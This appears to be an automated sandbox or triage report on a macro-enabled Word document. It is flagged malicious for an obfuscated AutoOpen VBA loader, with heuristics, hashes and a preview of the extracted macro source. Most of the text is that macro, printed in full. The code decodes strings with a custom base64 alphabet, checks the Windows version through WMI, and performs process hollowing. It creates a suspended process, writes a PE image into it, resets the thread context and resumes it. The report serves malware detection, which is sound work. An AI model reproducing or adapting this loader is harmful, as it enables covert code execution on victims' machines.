MALICIOUS
Risk Score: 172
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a highly obfuscated VBA macro loader. The presence of AutoOpen, GetObject calls, and an obfuscated auto-exec loader strongly suggests the intent to download and execute a second-stage payload. No specific family could be identified due to the heavy obfuscation.
Heuristics 7
- VBA project inside OOXML (medium, 4 related findings) OOXML_VBA: Document contains a VBA project — VBA macros present
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: cvwlu = "." Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e=")) Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE="))
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
  Matched line in script: cvwlu = "." Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e=")) Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE="))
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched line in script: Public Sub AutoOpen() Call ecuuxx
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs (all found in document text, OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27215 bytes |

SHA-256: a8334c74ec0852a0f0513683974dd154a8d615eb44424892b244406df304bc38

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Const faQQGe = "hJazhEDezutwVddxWBRyUuDOXDQzUqgfSnPzgWHZxoRxwiaoVflFtFBJhLxZKfYRVjqMfFVnSoEDttSHJHAeszEJdtVETuDiPJnGBtJIEzcWiebxhMdfEmZvHStmyUDwStPKwftYHzvpEOqLVhibFliBMrSIIogpncVRehUxlzmTZFnJqvhXsZQzycbxCRimlgCfzJexPCMdDdXqy"
#If Win64 Then
Private Type AEwDj
l As LongLong
h As LongLong
End Type
#End If
Private Const KdCvq = 16
Private Const DcHYJe = 8
Private Const qKhhmZ = 512
Private Const KboWq = 80
#If Win64 Then
Private Type ykwrH
a As Integer
b As Integer
c As Byte
d As Byte
e As Integer
f As Long
g As Integer
h As Integer
i As Long
j As Integer
k As Integer
l As Long
m As Long
n(8 - 1) As AEwDj
o(16 - 1) As AEwDj
q(96 - 1) As Byte
End Type
#End If
Private Type UIdMhY
YpOBSY As Long
jENbd As Long
End Type
Private Type yYLr
a As Long
b As Long
c As Long
d As Long
e As Long
f As Long
g As Long
h(KboWq - 1) As Byte
i As Long
End Type
Private Type RTIf
QdXMx As Integer
BxdGn As Integer
a As Long
b As Long
c As Long
d As Integer
e As Integer
End Type
Private Type jtoTlp
#If Win64 Then
a As Integer
b As Byte
c As Byte
d As Long
e As Long
f As Long
vizN As Long
g As Long
labilr As LongLong
i As Long
j As Long
k As Integer
l As Integer
m As Integer
n As Integer
o As Integer
p As Integer
q As Long
uDAsl As Long
rVUVit As Long
r As Long
s As Integer
t As Integer
u As LongLong
v As LongLong
w As LongLong
x As LongLong
y As Long
z As Long
JOKj(KdCvq - 1) As UIdMhY
#Else
a As Integer
b As Byte
c As Byte
d As Long
e As Long
f As Long
vizN As Long
g As Long
h As Long
labilr As Long
i As Long
j As Long
k As Integer
l As Integer
m As Integer
n As Integer
o As Integer
p As Integer
q As Long
uDAsl As Long
rVUVit As Long
r As Long
s As Integer
t As Integer
u As Long
v As Long
w As Long
x As Long
y As Long
z As Long
JOKj(KdCvq - 1) As UIdMhY
#End If
End Type
Private Type AMAm
#If Win64 Then
a1 As LongLong
a2 As LongLong
a3 As LongLong
a4 As LongLong
a5 As LongLong
a6 As LongLong
gjpHMz As Long
b1 As Long
b2 As Integer
b3 As Integer
b4 As Integer
b5 As Integer
b6 As Integer
b7 As Integer
b8 As Long
c1 As LongLong
c2 As LongLong
c3 As LongLong
c4 As LongLong
c5 As LongLong
c7 As LongLong
d1 As LongLong
TUtr As LongLong
LoQwg As LongLong
d2 As LongLong
d3 As LongLong
d4 As LongLong
d5 As LongLong
d6 As LongLong
e1 As LongLong
e2 As LongLong
e3 As LongLong
e4 As LongLong
e5 As LongLong
e6 As LongLong
e7 As LongLong
e8 As LongLong
e9 As LongLong
f1 As ykwrH
f2(26 - 1) As AEwDj
f3 As LongLong
f4 As LongLong
f5 As LongLong
f6 As LongLong
f7 As LongLong
f8 As LongLong
#Else
gjpHMz As Long
a As Long
b As Long
c As Long
d As Long
e As Long
f As Long
g As yYLr
h As Long
i As Long
j As Long
k As Long
l As Long
m As Long
tGpi As Long
n As Long
o As Long
vnFgE As Long
q As Long
r As Long
s As Long
t As Long
u As Long
v As Long
w(qKhhmZ - 1) As Byte
#End If
End Type
Private Type wvLO
NtEnt(DcHYJe - 1) As Byte
a As Long
FNlCx As Long
qftsSA As Long
ddxYs As Long
b As Long
c As Long
d As Integer
e As Integer
f As Long
End Type
Private Type MKPrK
Satx As Long
IPcoLv As RTIf
QEoJt As jtoTlp
End Type
Private Type HfBySv
GfRx As LongPtr
FXBYNC As LongPtr
a As Long
b As Long
End Type
Private Type MSXCq
WONa As Long
HyeEo As Long
End Type
Private Type IrzMRQ
kPYKfS As Integer
a As Integer
b As Integer
c As Integer
d As Integer
e As Integer
f As Integer
g As Integer
h As Integer
i As Integer
j As Integer
k As Integer
l As Integer
m As Integer
n(4 - 1) As Integer
o As Integer
p As Integer
q(10 - 1) As Integer
IOpwT As Long
End Type
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As WxOLed, lpProcessInformation As HfBySv) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As WxOLed, lpProcessInformation As HfBySv) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As AMAm) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As AMAm) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const AdvW = &H1000
Private Const MGYPq = &H2000
'Private Const PAGE_READWRITE = &H4
Private Const TFsFB = &H40
Private Const gEuwv = 260
Private Const FExse = &H4
Private Const mHnR = &H100000
Private Const RwOv = &H10000
#If Win64 Then
Private Const KtngY = mHnR
#Else
Private Const KtngY = RwOv
#End If
Private Const zzynpU = KtngY Or &H1
Private Const bfVtU = KtngY Or &H2
Private Const GEio = KtngY Or &H4
Private Const SISk = KtngY Or &H8
'Private Const CONTEXT_DEBUG_REGISTERS = KtngY Or &H10
'Private Const CONTEXT_EXTENDED_REGISTERS = KtngY Or &H20
Private Const DOtzf = zzynpU Or bfVtU Or GEio
'Private Const VERBOSE = False
Private Const RLdd = &H5A4D
Private Const CIRNLG = &H4550
Private Const eTjlT = &H14C
Private Const CKikPI = &H8664
Private Const HjAi = 64
Private Const ZFFRNE = 40
Private Const dmnL = 20
Private Const UzRZV = 8
Private Const pelHUt = 8
Private Const rIxaUH = 2
#If Win64 Then
Private Const Jleg = 264
Private Const usxAh = 8
#Else
Private Const Jleg = 248
Private Const usxAh = 4
#End If
'Private Const IMAGE_DIRECTORY_ENTRY_EXPORT = 0
'Private Const IMAGE_DIRECTORY_ENTRY_IMPORT = 1
'Private Const IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
'Private Const IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3
'Private Const IMAGE_DIRECTORY_ENTRY_SECURITY = 4
Private Const LGRL = 5
'Private Const IMAGE_DIRECTORY_ENTRY_DEBUG = 6
'Private Const IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
'Private Const IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8
'Private Const IMAGE_DIRECTORY_ENTRY_TLS = 9
'Private Const IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
Private Type WxOLed
a As Long
b As String
c As String
d As String
e As Long
f As Long
g As Long
h As Long
i As Long
j As Long
k As Long
jagfF As Long
fjoHnh As Integer
l As Integer
m As LongPtr
n As LongPtr
o As LongPtr
p As LongPtr
End Type
Private Type CIhc
aFxZ As Integer
NeOv As Integer
ZFvE As Integer
nxitVc As Integer
fWhyow As Integer
aGDpA As Integer
tEgXm As Integer
GVXVJ As Integer
zyxAp As Integer
End Type
Public Sub dSbnp(ByRef axEZ() As Byte, strArguments As String)
Dim qRJXlA As IrzMRQ
Dim SjsSB As LongPtr: SjsSB = VarPtr(qRJXlA)
Call RtlMoveMemory(SjsSB, VarPtr(axEZ(0)), HjAi)
If Not qRJXlA.kPYKfS = RLdd Then
Exit Sub
End If
Dim kKrysl As MKPrK
Dim KVEhU As LongPtr: KVEhU = VarPtr(kKrysl)
Call RtlMoveMemory(KVEhU, VarPtr(axEZ(qRJXlA.IOpwT)), Jleg)
If Not kKrysl.Satx = CIRNLG Then
Exit Sub
End If
#If Win64 Then
If kKrysl.IPcoLv.QdXMx = eTjlT Then
Exit Sub
End If
#Else
If kKrysl.IPcoLv.QdXMx = CKikPI Then
Exit Sub
End If
#End If
Dim oHGx As String
oHGx = Space(gEuwv)
Dim NfEZn As Long
NfEZn = GetModuleFileName(0, oHGx, gEuwv)
oHGx = Left(oHGx, InStr(oHGx, vbNullChar) - 1)
Dim zkUHCZ As String
zkUHCZ = oHGx + " " + strArguments
Dim CZEMa As String
Dim tEQRo As HfBySv
Dim UHRhOa As WxOLed
UHRhOa.jagfF = 1
UHRhOa.fjoHnh = 0
Dim TOkZ As Long
TOkZ = CreateProcess(CZEMa, oHGx + " " + strArguments, 0&, 0&, False, FExse, 0&, CZEMa, UHRhOa, tEQRo)
If TOkZ = 0 Then
Exit Sub
End If
Dim KlSZh As AMAm
KlSZh.gjpHMz = bfVtU
Dim arAxIk As Long
#If Win64 Then
Dim sXeVn(0 To (LenB(KlSZh) - 1)) As Byte
Call RtlMoveMemory(VarPtr(sXeVn(0)), VarPtr(KlSZh), LenB(KlSZh))
arAxIk = GetThreadContext(tEQRo.FXBYNC, VarPtr(sXeVn(0)))
#Else
arAxIk = GetThreadContext(tEQRo.FXBYNC, KlSZh)
#End If
If arAxIk = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
Else
#If Win64 Then
Call RtlMoveMemory(VarPtr(KlSZh), VarPtr(sXeVn(0)), LenB(KlSZh))
#End If
End If
Dim OsGNJQ As UIdMhY
Call RtlMoveMemory(VarPtr(OsGNJQ), VarPtr(kKrysl.QEoJt.JOKj(LGRL)), UzRZV)
Dim RGhfI As LongPtr: RGhfI = 0
If OsGNJQ.YpOBSY = 0 Then
RGhfI = kKrysl.QEoJt.labilr
End If
Dim ovRj As LongPtr
ovRj = VirtualAllocEx(tEQRo.GfRx, RGhfI, kKrysl.QEoJt.uDAsl, AdvW Or MGYPq, TFsFB)
If ovRj = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
If ovRj <> kKrysl.QEoJt.labilr Then
Dim sQxTRD As Long
Dim reDk As LongPtr
#If Win64 Then
sQxTRD = 0 + qRJXlA.IOpwT + 4 + dmnL + 24
#Else
sQxTRD = 0 + qRJXlA.IOpwT + 4 + dmnL + 28
#End If
Call RtlMoveMemory(VarPtr(axEZ(0 + sQxTRD)), VarPtr(ovRj), usxAh)
End If
Dim CZMXC As LongPtr
CZMXC = VirtualAlloc(0&, kKrysl.QEoJt.uDAsl, AdvW Or MGYPq, TFsFB)
If CZMXC = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Call RtlMoveMemory(CZMXC, VarPtr(axEZ(0)), kKrysl.QEoJt.rVUVit)
Dim ZvPS As Integer
Dim tBueiZ As wvLO
For ZvPS = 0 To (kKrysl.IPcoLv.BxdGn - 1)
Call RtlMoveMemory(VarPtr(tBueiZ), VarPtr(axEZ(qRJXlA.IOpwT + Jleg + (ZvPS * ZFFRNE))), ZFFRNE)
Dim eWnguz As String: eWnguz = ZakOxT(tBueiZ.NtEnt)
Dim ryGZ As LongPtr: ryGZ = CZMXC + tBueiZ.FNlCx
Dim zrpw As Long: zrpw = tBueiZ.qftsSA
Call RtlMoveMemory(ryGZ, VarPtr(axEZ(0 + tBueiZ.ddxYs)), zrpw)
Next ZvPS
If ovRj <> kKrysl.QEoJt.labilr Then
Dim gTCQ As Long: gTCQ = OsGNJQ.jENbd
Dim PnKYGE As Long: PnKYGE = OsGNJQ.YpOBSY
Dim hQfA As MSXCq
Dim zPpTT As Long: zPpTT = 0
Do While zPpTT < gTCQ
Dim cmnCj As LongPtr: cmnCj = CZMXC + PnKYGE + zPpTT
Call RtlMoveMemory(VarPtr(hQfA), cmnCj, pelHUt)
zPpTT = zPpTT + hQfA.HyeEo
If (hQfA.WONa <> 0) And (hQfA.HyeEo <> 0) Then
Dim DwvG As Long: DwvG = (hQfA.HyeEo - pelHUt) / rIxaUH
Dim ZioWQb As Long: ZioWQb = hQfA.WONa
Dim nIhCF As LongPtr: nIhCF = cmnCj + pelHUt
Dim oxMcOM As Integer
Call RtlMoveMemory(VarPtr(oxMcOM), nIhCF, rIxaUH)
ZvPS = 0
For ZvPS = 0 To (DwvG - 1)
Dim KBqA As Integer: KBqA = ((oxMcOM And &HF000) / &H1000) And &HF
Dim ofYp As Integer: ofYp = oxMcOM And &HFFF
If KBqA = 0 Then
Exit For
End If
Dim tXYcq As Integer: tXYcq = 0
If KBqA = &H3 Then
tXYcq = 4
ElseIf KBqA = &HA Then
tXYcq = 8
End If
Dim aoAaKy As LongPtr
aoAaKy = CZMXC + ZioWQb + ofYp
If tXYcq <> 0 Then
Dim xylAbw As LongPtr
Call RtlMoveMemory(VarPtr(xylAbw), aoAaKy, tXYcq)
xylAbw = xylAbw - kKrysl.QEoJt.labilr + ovRj
Call RtlMoveMemory(aoAaKy, VarPtr(xylAbw), tXYcq)
End If
nIhCF = nIhCF + rIxaUH
Call RtlMoveMemory(VarPtr(oxMcOM), nIhCF, rIxaUH)
Next ZvPS
End If
Loop
End If
Dim eHKzD As Long
eHKzD = WriteProcessMemory(tEQRo.GfRx, ovRj, CZMXC, kKrysl.QEoJt.uDAsl, 0&)
If eHKzD = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Call VirtualFree(CZMXC, kKrysl.QEoJt.uDAsl, &H10000)
Dim FUTPN As LongPtr
#If Win64 Then
FUTPN = KlSZh.LoQwg + 16
#Else
FUTPN = KlSZh.tGpi + 8
#End If
eHKzD = WriteProcessMemory(tEQRo.GfRx, FUTPN, VarPtr(ovRj), usxAh, 0&)
If eHKzD = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Dim SFHQRr As LongPtr: SFHQRr = ovRj + kKrysl.QEoJt.vizN
#If Win64 Then
KlSZh.TUtr = SFHQRr
#Else
KlSZh.vnFgE = SFHQRr
#End If
Dim cWcla As Long
#If Win64 Then
Call RtlMoveMemory(VarPtr(sXeVn(0)), VarPtr(KlSZh), LenB(KlSZh))
cWcla = SetThreadContext(tEQRo.FXBYNC, VarPtr(sXeVn(0)))
#Else
cWcla = SetThreadContext(tEQRo.FXBYNC, KlSZh)
#End If
If cWcla = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Dim hTgZJ As Long
hTgZJ = ResumeThread(tEQRo.FXBYNC)
If Not hTgZJ = 1 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
End Sub
Public Function hGGsS(ByVal WtYFi)
Const HqYhuI = "AaoWqFNCeUMTVBn3cKfbDHL4OivkR2j0lhG1QxurtS8wymY7Jpg+EIXPzs9d5Z/6"
Dim BiFNKb, iwZoMh, kEdOz
WtYFi = Replace(WtYFi, vbCrLf, "")
WtYFi = Replace(WtYFi, vbTab, "")
WtYFi = Replace(WtYFi, " ", "")
BiFNKb = Len(WtYFi)
If BiFNKb Mod 4 <> 0 Then
Exit Function
End If
For kEdOz = 1 To BiFNKb Step 4
Dim zQlaY, vZffu, QWlG, BDmZ, qFoH, JfQloN
zQlaY = 3
qFoH = 0
For vZffu = 0 To 3
QWlG = Mid(WtYFi, kEdOz + vZffu, 1)
If QWlG = "=" Then
zQlaY = zQlaY - 1
BDmZ = 0
Else
BDmZ = InStr(1, HqYhuI, QWlG, vbBinaryCompare) - 1
End If
If BDmZ = -1 Then
Exit Function
End If
qFoH = 64 * qFoH + BDmZ
Next
qFoH = Hex(qFoH)
qFoH = String(6 - Len(qFoH), "0") & qFoH
JfQloN = Chr(CByte("&H" & Mid(qFoH, 1, 2))) + Chr(CByte("&H" & Mid(qFoH, 3, 2))) + Chr(CByte("&H" & Mid(qFoH, 5, 2)))
iwZoMh = iwZoMh & Left(JfQloN, zQlaY)
Next
hGGsS = iwZoMh
End Function
Public Function nquEji(akVQMX() As Byte) As Long
On Error Resume Next
nquEji = UBound(akVQMX) - LBound(akVQMX) + 1
End Function
Private Function JyTt(vppbuW As String) As Byte()
Dim DwaXV() As Byte
Dim rQcAE As Integer: rQcAE = FreeFile
Open vppbuW For Binary Access Read As #rQcAE
ReDim DwaXV(FileLen(vppbuW)) As Byte
Get #rQcAE, , DwaXV
Close #rQcAE
JyTt = DwaXV
End Function
Private Function ZakOxT(baBytes() As Byte) As String
Dim JRVfve As String: JRVfve = ""
Dim WXvnpO As Integer
For WXvnpO = 0 To nquEji(baBytes) - 1
If baBytes(WXvnpO) <> 0 Then
JRVfve = JRVfve & Chr(baBytes(WXvnpO))
Else
Exit For
End If
Next WXvnpO
ZakOxT = JRVfve
End Function
Private Function cxujCQ(XVOBsU As String) As Byte()
Dim TUxQAZ() As Byte
TUxQAZ = StrConv(XVOBsU, vbFromUnicode)
cxujCQ = TUxQAZ
End Function
Public Function xWkMza()
Dim cvwlu As String
Dim UxdB As Variant
Dim sQKvIC As Variant
Dim Vwpgn As Variant
Dim verStr() As String
Dim dFst As Double
cvwlu = "."
Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e="))
Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE="))
For Each Vwpgn In sQKvIC
verStr = Split(Vwpgn.Version, cvwlu)
dFst = CDbl(verStr(0) & cvwlu & verStr(1))
Exit For
Next
If dFst < 6.2 Then
xWkMza = 1
Else
xWkMza = 0
End If
End Function
Public Sub ecuuxx()
Dim yhWAXh As String
Dim kUZqtY() As Byte
Dim FnEr As String
Dim bIsk As String
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlKXs1buHEeoZDDGAGUDFcDqKaHqqx4q2YOEsx2Fp+k4B+RGsxjNDlcuZ7RPKccgaCkuBbkXiE2XFgifelTIBWeqIUbxHDKfA7bD5lVbAlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlcuZ7RPKccgA7HFeleGHHDEHfDFU3KQxVKfHRcuZ7RPKccIpokXZ+2FaWTuHzifelTIBWeqIUbxHDKfA7bD5lV+AlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlcuZ7RPKoVQelTIKfeoexHHBFDxafbEiUbqDx4qU7kPBEDqBRO1UGcXpSiLsETuHzifelTIBWeqIUbxHDKfA7bD5lVbOlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlKXs1DXZu2C2hRuDlTIKfeoexcHacKqFDcfHRKXs1DXZu2C2hRuHRKXs1DXZu2C2hRuDYi4hxeGA7DEVlbDxnHHKFeoZBbgA+VoA7iGA7DEcl")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If xWkMza() <> 0 Then
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("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")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
Else
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("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")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
End If
If xWkMza() <> 0 Then
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("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")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
Else
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("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")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
End If
End Sub
Public Sub AutoOpen()
Call ecuuxx
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 65536 bytes |

SHA-256: 72e3d7df95117d8f2487fe147e30481b96964adf8188281d9c1640be5fbcf1fd

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s))